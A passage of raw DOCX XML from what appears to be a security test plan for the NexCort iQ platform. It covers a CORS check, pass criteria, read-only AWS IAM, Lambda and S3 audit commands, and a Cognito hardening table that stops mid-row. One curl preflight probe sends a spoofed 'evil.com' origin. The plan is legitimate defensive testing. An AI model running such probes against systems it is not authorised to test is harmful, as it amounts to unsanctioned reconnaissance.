          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Test for overly permissive CORS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I -X OPTIONS https://api.rapidcortex.us/api/incidents \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Origin: https://evil.com' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Access-Control-Request-Method: GET'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Expected: NO Access-Control-Allow-Origin: * or evil.com in response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Allowed origins should only be app.rapidcortex.us and known domains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All nine RBAC roles isolated — no cross-role endpoint access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">BOLA: agencyId from JWT, not request body — cross-agency requests return 403</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate limiting active on public endpoints (CAP ingest, QR report)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS restricted to known NexCort iQ domains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No stack traces or internal paths in error responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No /v0/, /debug/, or /internal/ paths accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 9 — Cloud Infrastructure Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NexCort iQ runs entirely on AWS. This phase validates IAM policies, S3 bucket configurations, Lambda security, Cognito hardening, and DynamoDB access controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">IAM Policy Audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check for wildcard IAM policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws iam list-policies --scope Local | jq '.Policies[].PolicyName' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | xargs -I{} aws iam get-policy-version \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    --policy-arn arn:aws:iam::{ACCOUNT}:policy/{} \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    --version-id v1 \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.PolicyVersion.Document.Statement[] | select(.Action == "*")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check Lambda execution roles for over-permission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws lambda list-functions | jq '.[].FunctionName' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | xargs -I{} aws lambda get-function-configuration --function-name {} \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.Role'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Use IAM Access Analyzer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws accessanalyzer list-findings --analyzer-arn {ANALYZER_ARN} \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.findings[] | select(.status=="ACTIVE")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">S3 Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check all buckets for public access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3api list-buckets | jq '.Buckets[].Name' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | xargs -I{} aws s3api get-public-access-block --bucket {}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check bucket policies for public access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3api get-bucket-policy --bucket rapid-cortex-media-{stage} \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | jq '.Policy' | python3 -c "import sys,json; print(json.dumps(json.loads(json.load(sys.stdin)), indent=2))"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verify BillingInvoicesBucket is not public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3api get-public-access-block --bucket rapid-cortex-billing-invoices-prod</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Cognito Hardening Checklist</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60"/>
        <w:gridCol w:w="3240"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Setting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">AWS CLI Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MFA enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Required for rcsuperadmin, rcadmin; optional for others</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">describe-user-pool → MfaConfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Password policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Min 12 chars, complexity required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">describe-user-pool → Policies.PasswordPolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Account lockout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">After 5 failed attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
